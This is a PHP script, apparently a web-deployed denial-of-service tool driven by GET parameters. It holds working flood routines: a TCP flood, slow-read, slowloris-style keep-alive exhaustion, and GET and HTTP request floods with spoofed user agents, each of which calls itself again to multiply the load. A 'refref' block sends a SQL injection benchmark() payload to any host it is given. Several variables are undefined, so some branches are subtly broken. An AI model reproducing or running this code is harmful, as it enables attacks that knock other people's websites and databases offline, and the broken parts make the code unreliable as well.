<?
if(isset($_GET['tcp']))
{
	$host = $_GET['ip'];
	$time = $_GET['time'];
	$port = 80;
	$timei = time();
    $out = str_repeat("A", $size);
    $max_time = 100;
    while (time() - $timei < $time) {
    	$ch = @curl_init();
        @curl_setopt($ch, CURLOPT_URL,  $myhost."?tcp&ip=$host&time=$time");
        @curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        @curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
        @curl_setopt($ch, CURLOPT_HEADER, 0);
        @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 0);
        @curl_setopt($ch, CURLOPT_TIMEOUT, 10);
        @curl_exec($ch);
        $fp = stream_socket_client("tcp://$host:$port", $errno, $errstr, 30);
        if ($fp)
        {
        	stream_socket_sendto($fp, 'f*ck',STREAM_CLIENT_ASYNC_CONNECT);
        	@fclose($socket);
        }
    }
    script();
}

if(isset($_GET['slowread'])) // post & head
{
    $host = $_GET['ip'];
    $time = $_GET['time'];
    $timei = time();
    $brow = array("", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 YaBrowser/17.6.1.749 Yowser/2.5 Safari/537.36", " Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", "Opera/9.21 (Windows NT 5.1; U; en)", "Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0");
    $rand_keys = array_rand($brow, 2);
    $i = 0;
    for ($i = 0; $i < 100; $i++) {
    	$fs[$i] = @fsockopen($ip, 80, $errno, $errstr);
    }
    while ((time() - $timei < $time)) {
    	 $ch = @curl_init();
         @curl_setopt($ch, CURLOPT_URL,  $myhost."?slowread&ip=$host&time=$time");
         @curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
         @curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
         @curl_setopt($ch, CURLOPT_HEADER, 0);
         @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 0);
         @curl_setopt($ch, CURLOPT_TIMEOUT, 5);
         @curl_exec($ch);
    	 for ($i = 0; $i < 100; $i++) {
    	 	$out =  "$mhtd / HTTP/1.1\r\n";
    		$out .= "Host: {$host}\r\n";
    		$out .= "User-Agent: ".$brow[$rand_keys[1]]."\r\n";
    		$out .= "Content-Length: " . rand(1, 1000) . "\r\n";
    		$out .= "X-a: " . rand(1, 10000) . "\r\n";
    		if (@fwrite($fs[$i], $out)) {
    			continue;
    		} else {

    			$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
    		}
        }
    }
    script();
}


// refref
$host = $_GET['host'];
if( $curl = curl_init() ) {
    curl_setopt($curl, CURLOPT_URL, $host." and(select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
    curl_setopt($curl, CURLOPT_RETURNTRANSFER,true);
    $out = curl_exec($curl);
    echo $out;
    curl_close($curl);
}
//--

if(isset($_GET['doslow'])) {
	$host = $_GET['ip'];
    $port = 80;
    $time = $_GET['time'];
    $headers = "$mhtd / HTTP/1.1\r\nHost: {$host}\r\nKeep-Alive: 300\r\nConnection: Keep-Alive\r\n User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\r\nCookie: data1=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n\r\n";
    $timei = time();
    $fs = array();
    while (time() - $timei < $time) {
    	 $myhost = 'http://'.$_SERVER['HTTP_HOST'].'/'.$_SERVER['PHP_SELF'];
    	 $ch = @curl_init();
         @curl_setopt($ch, CURLOPT_URL,  $myhost."?doslow&ip=$host&time=$time");
         @curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
         @curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
         @curl_setopt($ch, CURLOPT_HEADER, 0);
         @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 0);
         @curl_setopt($ch, CURLOPT_TIMEOUT, 5);
         @curl_exec($ch);
    	for ($i = 0; $i < 100; $i++){
    		$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
            fwrite($fs[$i], $headers);
        }
        while (time() - $timei < $time) {
        	for ($i = 0; $i < count($fs); $i++) {
        		if (!$fs[$i]){
        			$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
    			    fwrite($fs[$i], $headers);
    			}
    			fread($fs[$i], 1);
    		}
    		sleep(mt_rand(0.5, 2));
    	}
    }
    script();
}


if(isset($_GET['get'])){
    $input = array("", "home.html", "index.html", "home.php", "index.php");
    $brow = array("", "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru-RU) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5", " Opera/9.80 (Windows NT 6.1; MRA 5.8 (build 4110)) Presto/2.12.388 Version/12.10", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4", "Opera/9.80 (Windows NT 6.0; MRA 5.10 (build 5265)) Presto/2.12.388 Version/12.11");
    $rand_keys = array_rand($input, 2);	
    $rand_keys1 = array_rand($brow, 2);
    $server = $_GET['ip'];
    $time = $_GET['time'];
    $timei = time();
    while (time() - $timei < $time) {
        $request =  "GET / HTTP/1.1\r\n";
        $request .= "Host: $server\r\n";
        $request .= "User-Agent: ".$brow[$rand_keys1[1]]."\r\n";
        $request .= "Keep-Alive: 900\r\n";
        $request .= "Referrer: ".$input[$rand_keys[1]]."\r\n";
        $request .= "Accept: *.*\r\n";
    	$ch = @curl_init();
        @curl_setopt($ch, CURLOPT_URL,  $myhost."?get&ip=$server&time=$time");
        @curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        @curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
        @curl_setopt($ch, CURLOPT_HEADER, 0);
        @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 0);
        @curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        @curl_exec($ch);
        for ($i=0; $i < 1000 ; $i++) { 
        	$f[$i] = fsockopen($server, 80, $errno, $errstr);
		    fwrite($f[$i], $request);
		}
	}
}


if(isset($_GET['http'])){
	$timei = time();
    $server = $_GET['ip'];
    $time = $_GET['time'];
    $req =  array('POST','GET','HEAD');
    $brow = array("", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2", "Opera/9.80 (Windows NT 5.2; U; en) Presto/2.10.289 Version/12.00", "Opera/9.21 (Windows NT 5.1; U; en)", "Opera/9.80 (Windows NT 5.1; U; Distribution 00; ru) Presto/2.10.289 Version/12.00");
    $rand_keys = array_rand($brow, 2);
    while ((time() - $timei < $time)) {
    	foreach ($req as $mthd) {
    	    $ch = @curl_init();
            @curl_setopt($ch, CURLOPT_URL,  $myhost."?http&ip=$server&time=$time");
            @curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            @curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
            @curl_setopt($ch, CURLOPT_HEADER, 0);
            @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 0);
            @curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            @curl_exec($ch);
    	    $fs      = array();
            $request =  "$mhtd / HTTP/1.1\r\n";
            $request .= "Host: $server\r\n";
            $request .= "User-Agent: ".$brow[$rand_keys[1]]."\r\n";
            $request .= "Keep-Alive: 900\r\n";
            $request .= "Accept: *.*\r\n";
            for ($i = 0; $i < 100; $i++) {
            	$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
            }
            for ($i = 0; $i < 100; $i++) {
            	if (@fwrite($fs[$i], $request)) {
            		continue;
            	} else {
            		$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
            	}
            } 	
        }
    }
}
?>
